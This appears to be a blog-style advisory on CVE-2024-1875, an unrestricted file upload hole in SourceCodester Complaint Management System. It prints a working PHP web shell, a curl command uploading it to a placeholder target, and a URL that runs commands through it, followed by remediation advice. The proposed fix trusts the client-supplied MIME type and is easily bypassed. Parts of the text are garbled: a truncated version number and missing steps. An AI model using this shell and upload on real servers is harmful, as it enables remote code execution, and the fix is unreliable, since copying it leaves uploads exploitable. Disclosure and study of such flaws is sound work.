CVE-2024-1875 - Critical Unrestricted Upload Vulnerability in SourceCodester Complaint Management System 1. – Full Analysis, Exploit Example, and Remediation

In early 2024, a critical security vulnerability (CVE-2024-1875) was disclosed for the SourceCodester Complaint Management System 1.. This vulnerability allows remote attackers to upload arbitrary files—even malicious ones—through the application's "Lodge Complaint" feature, giving them a straightforward way to compromise the system.

This post gives you an exclusive, easy-to-understand overview, including proof-of-concept snippets, how the attack works, links to original sources, and how to protect your system.

Product: SourceCodester Complaint Management System 1.

- Component: Lodge Complaint Section (users/register-complaint.php)

Access Vector: Remote

- Exploit Disclosure: Vulnerability Database Entry (VDB-254723)

How Does the Vulnerability Work?

The users/register-complaint.php endpoint accepts file uploads (like attachments related to new complaints). However, there's no proper check on the file type, content, or extension. This means attackers can upload anything: PHP web shells, malware, or even reverse shell scripts.

Uploaded files are saved in a web-accessible directory.

The risk: Once a malicious PHP script is uploaded, attackers can browse to it and execute any commands under the web server's privileges.

Save the following PHP code as shell.php

<?php
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    system($_REQUEST['cmd']);
    echo "</pre>";
}
?>

Step 2: Upload the Shell

Open the "Lodge Complaint" form on the vulnerable application (usually at /users/register-complaint.php). In the file attachment field, select shell.php and submit the complaint.

Alternatively, the process can be automated using curl

curl -F "complaint_title=Test" \
     -F "complaint_desc=File upload test" \
     -F "file=@shell.php" \
     http://TARGET_HOST/users/register-complaint.php

Step 3: Access the Shell

After uploading, find the location where files are stored (usually, observation or brute-force guessing is needed). For example:

http://TARGET_HOST/user_docs/shell.php?cmd=whoami

This executes the whoami command on the server, proving code execution.

References & Further Reading

- VulDB – CVE-2024-1875 Detail
- SourceCodester Complaint Management System 1.
- Unrestricted File Upload explained

Block all uploads: Disable the feature until a patch is available.

2. Check all upload code: Ensure only specific file types (images, PDFs, etc.) are allowed. Use strict checks on file extension and MIME type.

Never store uploaded files in web-accessible directories.

4. Remove PHP execution permission from upload directories (see server docs for htaccess, permissions).

Example fix for PHP upload code (basic)

$allowed_types = ['image/jpeg', 'image/png', 'application/pdf'];
if(in_array($_FILES['file']['type'], $allowed_types)) {
    // Proceed with the upload
} else {
    die('Invalid file type.');
}

Conclusion

CVE-2024-1875 is a highly critical bug in a widely used open-source Complaint Management System. If you're using this system, act immediately. The vulnerability is easy to exploit, the code doesn't restrict what files are accepted, and real-world attacks are likely.

Always validate file uploads and keep your software up to date!

Have questions or need help? Drop them in the comments or contact your security team.

Stay updated and secure!

*(This article is exclusive content. Please link back if you reference any part of it.)*

Timeline

Published on: 02/26/2024 16:27:53 UTC
Last modified on: 02/29/2024 01:43:56 UTC